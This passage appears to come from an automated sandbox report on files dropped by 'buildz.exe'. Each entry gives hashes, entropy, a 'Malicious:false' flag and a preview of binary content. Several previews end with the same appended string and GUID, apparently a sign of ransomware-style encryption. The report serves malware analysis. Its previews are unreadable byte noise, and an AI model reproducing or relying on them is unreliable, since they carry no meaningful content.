[.#.)Q..9..x.J.&SO../....P.c......Z.;..^9.qW.C.^.......c.j&.2+Ns.....(...e.bMk..a{{g..co..&..r{Ns..:...\.K..A.J..T`EM.Q.w..6s.g2e.C.........z....[...K{.0.=.?...5.uQp..(l...M...z/S....T...N"....uA.7D...Q..>]@...L.....K0^xB...k.iBFQ.i".K...#/\...e.q...?..2Vc.}M.GY.jT.a:r...yo.#K.HV.....V...k.o..e.P#...V.z.X.......a........a.R.)....H..i....#.o...{.9H............#.U){..0.rl.h........*.E.1~d..]q. ......-+.n..=9.-N];..~.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1419
                        Entropy (8bit):7.856157818251272
                        Encrypted:false
                        SSDEEP:24:flT/UH0cSPpKB5IfDKs+AOqszGr+TURe6ZRG6bT0Rk7HAXZUoDf2uz/mZGbD:flTcHna46rEMdEWAXZUwfRz/4UD
                        MD5:A8E9F7F8118BAAAEA9481472DCE12D98
                        SHA1:509FD7CC8EAEC3B0ACC5D9772A21C9BD5C887152
                        SHA-256:FC012D937D4EBE01592C40B2953412886487576504DEB428EEDA55E4830EDB5E
                        SHA-512:3169B222F4B85F34377C4D5C659A34AF942DF8612F62134E585D20AD599EBBFEF89D96BEA3F596C4E766DF8E9E3EBFBFE49ACC76743339C1A8CDF6D9B8E243A9
                        Malicious:false
                        Preview:<?xml.%....f.._.....R>.{F0..4..y^...b.:.I.....A.....K..h.3...D.dn..(...v.P.u].......=`.WTk.^D...u|....p..6.T(...3...P%;#f?$._..C.}.O...OhS..}.s..cb%..n..y .'..v.+.f)..p....7.........gfQ<3..i..sJ.h..d.1...z.4.....o.j.....&t7.......n..t...&..?. .X.U......\.....Z......J,.@...0aR...w.4^7.m+.g..F...|4}.(,..o.p-..&.Zq..J..b*.....;.?...>...>#J.<..&+pU..9y....)c}.]...h.b.....dp}.3..#f..^... ..g.s....~.x.-.a.....UV.$;....w]}E.p<....T....~.....+fJ. t.%....jK...wsg..~..c..%Zn..#.x.....s.T....D..K.T....Ao...3..N..Ut..M}^y.tGY.6..r....W,.t_.P.....{....}A..';\.G.~...D ...a..rX{.)M.....(i........=......^l...I....b(?.B..^..8..z.#..r.V'..gv......~.J....:... W`FJQ8.<.A.+Q[T.7]..J....x.3hl..Lb\......e$.Q..OY.0...O.c7.k.|.GT......Y.)F.....4S...\,S.%.JJ....b..-..-*1....<.Z\...0..A._......2........7.wm.X..I,.4..qdR5..m.A..e.M.@.KQ+..*.....';..x2.......1..O..o............x9=.}'...{G.d..H/wh.`..-......D.%x.H.r..ubdf.W]=RG;....Kfo.}+./....mQ.^.}.....=.9w....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1546
                        Entropy (8bit):7.889937398526118
                        Encrypted:false
                        SSDEEP:24:mnTevhLYp1+Ryp18wydMStWKiLQmh7ghMTcJxlFkvOfwycgduWGbD:matVRyYtMStWKiLQmRndWwylPUD
                        MD5:7C66A4B36CD774CD3FAC23F844DDC1F8
                        SHA1:1BDDCE866CB10E69BFA2BACDD4B141AF1DC5C56B
                        SHA-256:F47A14E84E15DEEF53B5E9F290DB84BA95435854F7C0E86CE66EB427E3C00D78
                        SHA-512:1020D1F8D4E1CB77D9968DAE4F6FA6E6F7223DB6957005AEBF68CA54ABF433ACBA9002C660B52D151C10CCE2E6B204E3F0EC39EC9A0414CCAB8501D001EF55C8
                        Malicious:false
                        Preview:<?xml....!`...P.%.hTy.wGy0......$...M...n..Z..........A..iv...&..Y...g.|.j.....w....;.i.Q. .[.Z/q.S'.)Fh.I....4..3".,.1u..h..:.g.;...:.Tp......N..@D...J.....a)..........E.".....my.h...a.@..&b....V.fm..XoM....G]...D|..0D^.,.#...."..Z~a....=.........Ha.q..ul.-.Rc2.u.|."g.@..........Qra.*.H.._.6.:.qH:!..xN%'.=L..-.._.l........!.zF<.e}:^..D*;^@.......z .]`...K.`Z.cod..x..*........D....|.0...?.....IG..w'.. Hse?;... .m].....&../....0.O.....u-(..kGN@c....e..._..j.zb.K..zg..)[.~.....C~.;.Rdc.....@.x..T....4]G...[....w.K.Z.EP.~.=....G.=..=.(R6n.........IV<..2....p....._...+.......oX..l8...URP.D..D|.1.[..-r.....3t.b`i03.Ra.....x..n._..L...!.....bO...q.y.9O9a?q.$.M.K./uR.-i.w.ch......Jh=..,n........'.....v..<..p.}..S..V.a.A}.oy..8.(...|......@..C.Y...;.w...v/2.ny....@...A..Br*I...T..o|......_.......c.5..0...x..`....P.-2.9.B...,R....G.[-..d.+.jls..9E3.A...l..T ...!....?\........A.i...T6d7.....O.......Q....w.N&.'....M...K:.Sj&..(k..EX...e.?-...X......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):903
                        Entropy (8bit):7.729475162792322
                        Encrypted:false
                        SSDEEP:24:+BD9jogQvIfOlt1PvX4HguAMMLqjrxZmX4QGbD:ujF4Ifw34HguAanfmX4QUD
                        MD5:E47738DE2DFBF5D48FF7C32DF78DF151
                        SHA1:7CB7B8ABA98AE68E3A6D0AAAA14A805A6F1A565A
                        SHA-256:EDDE7BF7C6FFF109D4351EF5B04DD310D499A21E12373D60A53692F28D532266
                        SHA-512:252AD7A1810D327ACB00C0F8FB5CBAC97B1DBF7AB1431FA17E748F789AD5CE8FB519D627AA84296616F311B1CE5CD500D6F3ED20E3FA15671616F65114FA0493
                        Malicious:false
                        Preview:<?xml.Mc.D+.......z.\..R.-F*..1...]...J....w.3...=tA.P.D....Fm._.""oL.A.sWF....8'X..B...h.%..wLw..W...[".?'j.q..MY..P....v>.@a...am..y...U."..l?...!.F. R....y..UMj.`..........|.#.7.2......~...0....$...E...O,...).,f..M.1.~".~.-.m`.;...e*..#...I..U....Iz.y.B*6...=......9.W..[.Y.x....3~%..K.cY..A<....[.E....Z"....$4k...\..C.@J...$.s...#X.+...X#.).m.o..F.......#@.9(.PJ.KR.6~.)a..8...nVA/qx5.S..!{.\...:h...Dim..9.o..R<......n.l...H.....J.. ..[..B..0.Ja....xG.. .....[........~.!.......J.?."@..2....xi..d.l.C..<U:...G.R..S.LiD;%.8..IX*.m.....l.#X...M.uh_(....g.0)._..a..Y....r4.E.e..p.w..)....].r/.LE.b..BI1.Q.*..:Q..X.../1..".6.OX[J..?..o#"..-Se2...8...*.D..._..P$..z-...w<O..X.{.G..n....$..{.&K.Y.....9v..1\.z....k.8lH(.Nh................s....v....}W..x n.].E...-.....y_>.=..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3566
                        Entropy (8bit):7.944472081478218
                        Encrypted:false
                        SSDEEP:96:E1J4WE+7IFLvXGaBtVVM+IbTx1mMKAzS4r2B7A:0JE3Lv2MM+iHzS4M7A
                        MD5:846E538DD0B87B2DB73093A684F5E877
                        SHA1:8D0BC43BDE05B37977ED1028B7E3722D465F477A
                        SHA-256:9B9B9C0F480730BAF1803FAC91C0991094AF4B4B4AB01EA4AA9187CF8D5243D3
                        SHA-512:2E22B4F45B07C91E69BA8D330ACECF077D0800A38CF0C22FB90DF6664BCEE1CEBF6227729624A8FA02822815608D4D0D5756234BE3D938A805E181850B880099
                        Malicious:false
                        Preview:<?xml{}.E.te..y...:.X.&...t.>..c...).y.z.,8..u...:..e...J.....P>.j.4..@y.$.?..C.|.*.}...W.^G..ii...uV...T.-...iO..%..eKT&.....b.._;Dg..K\....5".*..o...'PE[..W..L.&..H.\+.........m.Fu....(....c[W^..Aw...c...,;T.o..q......|.!..&d...>qi.E.,..i:..\..;.|.b'.kAP.{...........a...KTS..n.8:.;.v....a1..E..*.+.....[.<...2z.D..t..g.....3..P$;C.>...5B..[0.+%e\4...;....A....X..<`.._v]T....d.....rY...5b$.-......E...U..0..W.SD.J..@........"..B.7]G.0H.vG...;$q.\...-.<..B..X.v1v.#..&f...w. r...p........7..j.T.<...(.Z..5.$..S1e..s.Cg.Y....8..Iu.1.-.....|..u.L.Ta.....5.WH..s.IL.R...v...o..x.X../.5..xKii..W.%....W.s.....M...i..M...y..)..h&.q.^S!>p*.....-*....j,/...(g...i. ...>.:*....3..R.....p.q.....}[V...4.F.x.u.....R.R..1....$.s..;...9.....J.{..WP.;.....xYe<B2........n.q.......i7.....F~~}..oN5.Tu...v>..X]'f..>9..G..\=.$L~..R....h.!...%.~..A..".XG...y.a...w..x.$.....j....p...,..h`.EZ.p/.Bt..I..`.FP..>.Xad.....R.9.....p.:?.-0a..|.H.+...>O...i.V.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3677
                        Entropy (8bit):7.948508711066829
                        Encrypted:false
                        SSDEEP:96:LTvf8iBvzpWhLnC4qVPWkFwojpERQ2r6BGA:L78iB7Ay9wqiq2rWGA
                        MD5:6A603F501AE2AFFCE0E742E8C37D203D
                        SHA1:3982C20211E8A273CE0A486509E3AC42EA89983D
                        SHA-256:A4DEC76B1521F0E26DB17CE193A68E50A8151A44618B9AE9ADA7164FC7304212
                        SHA-512:6D1C7A8640C08CA1E678A0464CF3E72DED8E2DC630147E0D7D069DCE6A6E87651ABD8499355E4F6FBF2A07CEA27F574CBA978B1E498E1133BD316F3092086931
                        Malicious:false
                        Preview:<?xml.......pc):<..q.k%...9..<{..}.6/`.+=.....L..G.o._f..<.S.bQSoC...T.6..W..$...C. 9b+aE .ji._...GZ+.EX.a&.y....6...%I.9I.CZ..E.v...p3*wED .....5.I.....C.<..I..."5.,..{\.1....Sh#".S...1 ..?...;...:..~..W|-..f..{&..&5...pn.v..... ...;..R..Q.?d.<.T....P....F.q.hS....%.tK.L...S.E.v..6.b......B...........;)...I.3......l>)..,...L..h...L.|.|..^)a.J@@._,..6..#.l.....3E>..I..(,.,.~...3$._..hw.2.....D.=..*..$..h.`b.C.../.WU....<.".U...6H.@H.........%..8a.p.3.\...76.+|>.>...wF..%.#.(}..n...e..6OF...v..-.jM.._D..#..JrE~.S....j...WG..e]..|..&.|>.T.ISS.wF......"S.oj.tb....OS....)nr..3..}..l...3.V.|..g...q......b1./.<B..".M..U5..x7...=D.@{.. ..q.W.......4..U.{T.D_......k....b~..q_....X...o...h.W]..H..._.Y.D.....[..Y=..Kv.T.).....#^.R1........:......5./K.9....ug(WK.......e...u...C.8T.|=....Y..].5...d0.....h.5.v.R:<..[".!S.......+}..k9.......t..c.....~d"b@.....@.a...@...H.L.q.&.bSk....+.....6u...g^.et?..y.%..... .xk...U...C{/.I#.m.....XxV...m'..R./...9.!.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):744
                        Entropy (8bit):7.678612986494703
                        Encrypted:false
                        SSDEEP:12:U1KD1PWUs7/WMwMp8C+TQ5Zgbbn3cCrJHRb/qjh/3Hu3YgFCtT3LVP1bhxg526GX:S0oUsqMw7C1SXJHRE9XfAkfbSGbD
                        MD5:87F16077979EEC62A15C7A09C952A46D
                        SHA1:39B8E9D255589D0D6FAFD4048813569830142343
                        SHA-256:81B367A9A58AC1CFC30A684AAFD53F61D5038EEF921B8F12FA87BE3FD433430B
                        SHA-512:F98817A5EBF814B629ACD0548965E02E4C2FB3BE0544D87F36B3F97A217B7298A55027FAB74AFAA8532B87522BEAFB4AC0B827BC859D0BB96A928B83DDBB7F80
                        Malicious:false
                        Preview:<?xml *sC..gf[o."...'.q..X..y.m9.0..h..+G..l...R.."..a..5K\.......maY.....#..R..7L...El..*%.IJ..o.z....C..h.i....:'.E;t.0...g..N%$.Fet]....>.G.^2.S{5.A.S.....).r..E{$.s ....%[..`"<...1">s:......1.2.<.~A.Kg'.n....h.KE..G..sS|...x.......[J.(....".-.........}....9.S&v. .Y..X.Y..n...>.p...8*gn...C..N...x'.,...*...fcy.U.p.\..x..I.....+*....^...........&....._.>.]..1..}..P).E..Y....;.-..``..u.e.&.d*.~.y..+.@../M...d..e..=J..'.5F.^S3.3....A.u...}..X)..."o.m54#3.p6"...L.!Y....Q.`+.... v...=.9)KL..&1..;..e..!..V."_........ip.d..i...*F.7w.....,nD....D.........v....\5.n[...l.I...K.l..'.$Co..Q.p~f...Se.` ..p..;l)........%.3...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1620
                        Entropy (8bit):7.87264470830918
                        Encrypted:false
                        SSDEEP:48:yraEiSk3UThHV+ta5F4DQ+u9JMCQDhBX7zh8UD:yrVk3EhHwtQZ+u7Q/7N8A
                        MD5:2710B4CDA358C1AD376798ED28BDFD08
                        SHA1:4AA8C242243AB846628E2BBA76CA002B6304C04A
                        SHA-256:3E5460F7EE3268410FF6F4734E26AA09C526535A1C549869E60615EAA6D9DB74
                        SHA-512:FE86AA8268D2A3D92F0D8D907F3654836D947EDC5DDE151BAEFC8B4600488851648D5EE666FB9BD7DD8D440A58C603DC13E9CBC7B929B95D752D91457DD28847
                        Malicious:false
                        Preview:<?xml.*b....j..z..48...n.u..N.*...y.p.>..hBu...|={."..Q.jsK:...YyA..X..ln.K..*3.D..^._..F..Cz.bRr...v]...p.Nj.{..........r..e.k...zK=...6\........!..).0....rX..r.5..Y..[...<..Fb.d..[.1<O..{.......s.S.'.l......`..Dg.BaN..0.Q.........u.6l.0...bO.nu&)s.3...f.p..L`..0?.....k.I.....U......@..,..;..(.%..2..3I\.,.....*y6....{.K..L..G.o...a#..=".,.Ycm....K..G.w..~FL..!.fT.3....x...9.u?...7.E.b.....m_y.3P..xG..F..S*.tM..[.....j;..tCW.1.......v{<..h.....W...p.....>W?0.e..B.'$...$.....2...=.dU.j.Z...V..1w.g.i.;2...... P.f....M.....f..;.{.Q.....2......^h......f=T.>...C.E....on./Y-.....z..B {n.5...WF..W.@....y&H.0..[.U.2....M(...>..O..y..v..K3..<.c.-.M.$.'.qZx.....y.3~...E.....4P.XP.. .c.............yU.2zD..D..5*...H........8.x.....HL.P.6..1...._.VCG".....A...'...K.....[(#...{..$....{.j.{4....|.p/.k.s.w.;6\.P.m.]P...Y...K8O......u....9....u..H~,..E<......O.G8..I..........Bi#kl.j//m,@...0<7..y..N.6..]J.|.$.;l....>'h.y..B.L]..2E.X...].a.C5..=...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):821
                        Entropy (8bit):7.726013937879908
                        Encrypted:false
                        SSDEEP:12:WQGU85NoKeCXndyVGxtd0/ue6LZi32mNvLQkJdrBZLngGVPPVkFEwcEUHYlUE26A:WQGAKRdGe8l90k79ZLngqH6UBmGbD
                        MD5:59324D1B976452DF732799B2CDE79F33
                        SHA1:8665E1B82AF5EDE8E525A792AE5BA714E3779FF5
                        SHA-256:592A6B156023AA5D3BBC157E3E601F8249103DB54A6663DB7AC17642A0B1CE3B
                        SHA-512:1598E4DC4ED349A7B45A77B91540194A99FF8D08279940C7E04B3F369860E6F04A4953DEAED0ED503692D580551F66B7E0BA2820F53F5DB642138A8BF2134A16
                        Malicious:false
                        Preview:<?xml@.......W%..h..J~[_B...0.|LS.<.1.m.....9..w.....f..&}.,i....%K.W......qJ.....{....n0.....6{.Pt{-3.{...).>`.4.r....l..x(.......s`..e..0..Q....}...:.h....?~[.c7BI.SQ.0.....mr&...L.Fz.._.I...d....Y..!..\.l.K..8`x.-...:|x]_D....c...TR.n.0...)Q.c. ^..n..d.....}.....1..q-..Y.Z...../......._...IL..,G.Gd......\....As...Y;D.9,..W.X..`..':@..[..X^0&..ETb....N...T..$}O.I....I.....L.(...=.o.Y.M'........It.../.sT.->..=.B18.#0........ts..=..t1...|#}..'.n.\._..j.A..c.r.p......?-..}"c..a/.HDD.e`..9...%;f.FiK1=.-[..4......~N~...e..[M.....N......m.K..4k.A*.......r...7...?....a.dC0Em..[K..k0tM...?....5.s.c.. ..b..#.....e:c. ...M..W.R.T..b....e?.2..e.0.......>..V..Cb...v.x......~.%.......0lA..i..w.C+gE..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1034
                        Entropy (8bit):7.748343419409993
                        Encrypted:false
                        SSDEEP:24:i7UqLbgD3M5KHBZ+FuSNvjSCGx8tm4AQLr2hw8/bpaacY36GbD:Jw8D33bj++CGxKm4A08/bp6bUD
                        MD5:2AC75216532B2A38909DEA7B23D60215
                        SHA1:024D86E56DC3006491C45B97C3F445F15EA965B1
                        SHA-256:0B6D446C72C4FC42AF310228D1A091FB5E8CA3D11B438A44BB1D64C75390E2D9
                        SHA-512:9D53E3E55065B74CC46EDF831F2B6C10909793A3F5DDC918CD652772FF68BCC07B34A5EB1189293AFE0A6F851E794E33D7A460B523C300C398CA3DED82E2F32E
                        Malicious:false
                        Preview:<?xml.&...8tH$..e..&<..v.992.F.e.r...;...q.h...75.*....k8I.4.2..&...".....m-.fW0w....>..47..].0.p.T.Z:...R........mD....u@..U.).......w../cN...6.a......W..-_.......J.o....=.e..F.......)..p^.,...`a.S.A.8M.*....<.sC\[...l..#.w.....2lZK.HD.m.....?].K.YF...v$X...A.vM....Zd-.+r.4..._.c.l...J4.0jV....m.(b..v.0.U}....Bp~*...q2.EE.e.r..}-d7)....R.g.uQ..&............zx.&..b......<?P....6(..B.:..{a.G5..-m..l1;V.?.".8A;....EW#r...\u.....p.1[..*...wo..1...j$B=&_..(.L..&j.......5.eU.l.0.q.9A..\Ge(.L..S.E...U.Jl......d..P.r.P:W.V.Y-4....#.^T.......H..[*.-k=.2WS.3.;.R......=..K7.V......Z...,......W.A........+t.?.YB....]xj..,6"g.F.I.V..3.X.}x#;sS.u1(5.1Q%6...U.@J.k...}.......8..r]....U.-...\K..E..U....9Qd.5..~Q.(..q.!.w&.$...i.1...p........{P*"...4.PT.}a...a8.A?V....j..D.F.&..WyY..f....w2C.T.b.....s..+.z..S4.f..>K....sP..*6.........(.7.%.).D....Nso.Y..$E.,L........6.P...sEn.}./X......_J..T....g1...J.........>.A.{f.|...\Z..H.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1333
                        Entropy (8bit):7.8378854476727335
                        Encrypted:false
                        SSDEEP:24:X8wJJ+CFnLWZCsvQ4ihlImcCtoCyH9zXxhaoqmEKEXLQrZUHTwatEB9GbD:xJFLU/4hacoCIzXxhXlEXMrZUHSUD
                        MD5:C03C8F9B7D886A6FD365723EE7E75621
                        SHA1:3C1ECF5F6E1A5157D2BD9665B9764B218CFDE2E3
                        SHA-256:06A48E644980BFD82504B2F53D88564860BFA773910F8985C3A319483208A123
                        SHA-512:0EE21E59A934F6D447A8D862410BAF4556C5D7B7E59D5C3E8D03EB0960D5CEA4B3B27E830560BD0D4DE9BA8AA6734BC90F9CF5EAF396E6207BDD4E0DE1FED7CA
                        Malicious:false
                        Preview:<?xmllm#.{ehR$H....D.@..N.y..K..(.....S..|*.tK3}w.h....JuY{?.N6..!0<..O..?[.E2e...+.8.Eb.......E_....._.....lQu.e...s...g....&L"ft..!.U.35..W.>/.Zp.q.W....#...?w.^ ...Mbr..q.9<....l..=./.......g..Ul...3./..I$..rBH.(..d1..k..;.'.}M.....^%.j...pH..JX..........m.a.d.._..>.6...5GJ..|...k..b....aEJ.>...).......t.GU..O.x-..H-.Z....`.:T..|c..?.M.?k....]..%........p.)?.o0..8..Y.....s,.~'...U[.S.....]?.J,....>.?_.d.... .|..b.j..vWr.......u.9.......b. .....f.e]jB.E.....q/...]..m.rd..~.R/.%Z...}...cr..?5.ph.6...^x.t........'YUP....Oo.....iRl........8....Dd..Fb.../J.Wz..1m.b..1....;eL.o.Y..b...Dq....=cC.....gc..........L.e..w....V..b...'.FY........gn........]......R.T%~..N......ho..L...1.&..T.....1y.f.O.Q.Zu..)..O.$....8=..! ...r;. $.L>.]v...;...p.^...].M._..>..#..U)({....~.......9..:...,Q...'..[.T...U..>cR.....Y.z>..]+...F.P7.-..,..Fc....}.o72&.n.W.i..h..|....:.D}jO.M.9xrI...A.r.q.."..f.=..]...@.).nm.4Y}Y..2.......p.j.....%..7/*.r<8=.&..N~..p..jt.'.....>3.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2514
                        Entropy (8bit):7.936427149437735
                        Encrypted:false
                        SSDEEP:48:FYj7Cela5D9Tgg6XdNFb/FIUMqWzqLMi5ghLeuDpiNx+CfkldLUD:FYj7uCNBFIMLteLeipQ+C25A
                        MD5:CF70EA48CC53AB191A45A0AAA06CFCDC
                        SHA1:B84577A9CFCC63575D015C0D3B8178335F9791D2
                        SHA-256:324471B6DE1BFB6E8A0B664FC19A88FE23D475D0BBFEDC60033AE3BC4A78D5F3
                        SHA-512:58CA91CF7E23EC833B8402A13648A2F33696927925B52BE2406BCA123275978CC1AC72FFEDA48C915A99CCD7EFA5B80EE70DC04C3C4BFE167588009643FA4948
                        Malicious:false
                        Preview:<?xml75(3.#dCK...W-It.f.KZ...../.Kx....;.... \....n..g.....^..G....k9...0..&..^..F.....T.....d..\.[.e...e.R.'..3.C.W.H`:^..t...W.(..R....oB.r+.-Z..V.%)z..oB..:.R.U$..bND..0@Q.r......v$.#0.x........sq..[....T8..Hi..n ...*_rOE.....}...+..K.<...O.D...^...4pL.&.....|y.^t;.P..w....*/..z^ 4.R..@.d.\..w.iI.{?b.NC{&.&#.9O.!(...nd}(.<hN.D.~..D..\......N..STL.U+V-....H.'X.B....q...P.3......\.............BQ.......>...9..&....!..b}.Y...:.."K...v7....#.i......%8.w.....~C:..Ym.?(lT..(.....VY.8.'`..x..6).F&r...v..-v...........C..&....k..|p@-....."4-4[.E.8Y...UX..^4k....AU.~.....P.c..s...bo..p5gc.;T......f1.3.h./.%........51.j.%...7M...r....`R..u.....k4^.o.w..,._...1@Zs.G..Z..K....uH.....!..qpLlh.s9;.;.EX.U_.5K..R..X.(..R.....>1V..Q%..kv..u.........\..j..m.......K.J.Ds*8s.3..D.-.6...F......5.f.....I4..+..MF....^.J.L....X...w.>...U..f ,.!..z=...MB...l5...j.........=Ne.6.gYV......R.."...O..h...Xy..Q.8.. .j.Z..E.?\G.&.83.7L...XhMjv.._[...f....j..fk
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1346
                        Entropy (8bit):7.823238244679119
                        Encrypted:false
                        SSDEEP:24:PC0eTlaA71L0GjNU2U8doOm6o/RJr9tBFFslPsQczwDSx0wiOasGbD:P7Wog/K38doR6oXrtFNrUD
                        MD5:052E14184990D682DB131E6290C0E883
                        SHA1:63BBEFFE76A118743AC08C380BD5EAE39260A9EC
                        SHA-256:3BFED24C11200A0DAAA72ACD9B7FEB8BE3215914D8E15A3965391E0C2F7C634E
                        SHA-512:059E15A6028EC6507548C589FDF26D47C7F899BA852F9CD061F2314B30CACC1E437FDF2D023FFF4BC0E75B43407052F5A46840F7BE91C54104266335C39585D3
                        Malicious:false
                        Preview:<?xmlH..eK.-..&^R6.1..n<..<2..;...U..J.B.fX.....'-.&.m.^N.X..<.1....A......9........o<..-9?-.,..lxZJ..II.{.....S..Z...V. ......F....e=4. ..j..i...t$<1.F.2..?.1...61t..A.."..?...;..X..)...o...;.'Ho.o=VR....h.....4}.Wg..F.l....u.M.......@.9....`nD.}+m\O...+0H...t.X.c....}..n...\./.......jq......X~.M...?\.-..w....0.=...3.@P....Y.@...m....?.6.`........;|...y....M].....BLU..X../k.h%.....%3E$-t.c..z`..pg.|........Q#..7k....;....H. .%..8...<...Z.......?.|.c),/a.....y`.-`.o..T...V.........[V,..0...$...'.1..p..N...Sd3.x.W.N..Y. Z..Z~^.0..u...N......FJ..].9._.d.l.2.a;..Mr...w.u...J......K.O....d.4..y.MQ..S.Tw......!-....3.RoA...4....I.X.w.C..E....3m.ml...y2....p..B..O....5.....H. 0.j.....H`F..*7."....B..5.'..)8a.6..G.....9n...mD......?......"Q/.5.*s.(..;........^.$gi[[....C.......j.wM......b..M.,v.hx,1.......;,.....H.^.....G.}!..z..aw..y.d?...^.^.+.(t....&.....L|....v...Qz9.f.)..M..a.=...N....{x.|W....P.<:.;.bc3....`.i.Gu Jo..{.1..z(.....vnP..!.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1041
                        Entropy (8bit):7.828620182283592
                        Encrypted:false
                        SSDEEP:24:AIsKcfLHQh9Xz8vORu+btKVPnf+gNNGsdAA7ug06JLlFjzGbD:upfzQbjK+u+pKVP2gNH7ugNNrzUD
                        MD5:F86AA964B81A455486DDB7236CA0CF88
                        SHA1:4AB177DE02817CC835829DE7B094D29181E21E6D
                        SHA-256:072C48D24C1603E988A438A1B9EB7BF0844B8E6451C6457195D794664533095E
                        SHA-512:91B6E35223F6DA2B3ABB1B079260463F971055C81494B54A61D36F296D3050BE07E121FCB82F6702342D9D2E3E922836609730F2AB3572C7BCCB41A2CC3386F9
                        Malicious:false
                        Preview:<?xmlk.k......,.P5..;[.y..........{~!.G.*..~.QT....e..x&.....mp1.+..........|O.... 3.53-\....K:<....+-k.......O.f...:.K..h..]..e.......A.V'2.M!..}...u.`.....'.8.eg.X..r.v\....0/'(...c..q.^.....6...)..zWTF.^..........I.x.Po$.L)........[.2..p[..q.L.o.d........b.^.....y..7.f..D....>u..U..........%......7.3..|...HK.......>...aC .<....x..[7.......X-..2AoU.....=#...-...........B...XJ.l.....?w`.GP...t.D.....?...$ z.e.Uk.e.8A0o....W..H.@{.@}c..W...i..F`..j.1.....l... ..)..I.b...>^.a1.4....N...c..~.......-...;.<.UpA..,..(......P.{../..B_.N,t.....{....s. ......U.h..e.4.{;^..z.S..n!=..*..3P.d{.O..m.!+gY.`@...r.........a.@....o.o....S....-..7..7i..i.r]...vDL...= 2..f.N5.cp8_.}P....9.e.y..Q&.........u......R(2..0L..........(C..b.P.p.v.^...foC.... .....E....Tw.l5..4E...oC.B-Z.M..X.....xc.,jU...T{.k...=%V.X<....,:...?N!.d......n;....7.j..>.f...pP..(.A.....M.hZ.7.r.ly*>...[._.bV.$w.N......+.pG.K..."_MY..(O...xEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WP
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1664
                        Entropy (8bit):7.876530734792482
                        Encrypted:false
                        SSDEEP:48:C98tFl+l6CrxGi/TFF0/9+a5xAxI3G0Dswi6fVsZydUD:CeFl66CrxGiZFI9++ieV46A
                        MD5:257C928B1ADB0490FB153FECFDE506E0
                        SHA1:DD03302A56291DBDB8589666192FC76902C49F6B
                        SHA-256:37FB120A98FE80C998FD4C63A8410C4168BCFFEF152B10ACF4A277E9CC8E4457
                        SHA-512:0FD80A1836243E9EF6AC5C2AD52ACB0CF34B13E2A18F277CE0FE0C96E2C1ECDE78B87FCC32A736D82142561826B9F76735BED77786ECF3E6309ADF45F6BD7C07
                        Malicious:false
                        Preview:<?xml....D,p.Y.~..[d...j.Ru...#.JB..$r.)........Z....8.g.g.5A9VOC*.z.....g..IZ.v?7........;L.4.o..&....R..U.u.m,.}8..I=...<..D.M5./+8...Q...:uo..nUv/..._nR...8.W.z.hxP.?>.!.Z...].R.7B.._...8.0...5.w....#.l...g...`..S.E*.5..>....5.*.uk#pRj. ...\....Z.T.%.A..DN.........?.~..x.../......y. BT.O.^.9p.].9.|.P.~H^B...7.N....n........|....D..c.nl...C..)...3~c.a..s.u%......._6...Z...l...y..;\.._;......(.`....u.....4.(...Fbp..'..T.F.mg.t....e..$...%:.....\rm.*Kv..-.Y.g......,.;..&...Y..7.G.:.a.vLUwN..g.6(.i.C....+pD..Y.S.6c..S;...m..Z....s'.vD...c.,U.w...$.f{.<.%d}.l[R..-....[kI..k(....Q]@..y3.._...b.+.d$_g.wY.b/6+.......t..M.@5....y.9...k..'$"..op.jH..9..pu...E..i4..U...c.li...3..k...!..Y..;=gDz......{Ol3.$P>.-.b..UIz..s...i.y.&+.-y..bU.HBf.>.C...,l43....l>.B.q...m.k;..,K....Z......M......C....$....\..y...n.J..`..*w/g..&....H./-..K..m\....!i.....q.!.E..Eq....`h.H..^3..S...%..d..2......[....(..+....D....S7.>.a.j.....#di.L..x".....-^.$..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1195
                        Entropy (8bit):7.803049686751334
                        Encrypted:false
                        SSDEEP:24:AbAh4iAWihc4m9VpSuSxD07kRd9nW39qVzU1sDGbD:2tWZdN0507kRd+9CU2DUD
                        MD5:EB05A5B27AA495E0DBBAFC282A2B06B0
                        SHA1:FDD0057291DB379451CA9138E6462598DBF5B792
                        SHA-256:4DAA6F69F69CD2566CAC0240E4B56CE955E309C4A2AA83A9A3F0E2436A25F848
                        SHA-512:7892CBE27B10DD85418CEE4F0E9D3E49891FF511DE71682807E4DFA87D91CBC5C225E1F67A83D4B8D3B856443CD0CAED74410FA72200DDA8B1997046A3CF296F
                        Malicious:false
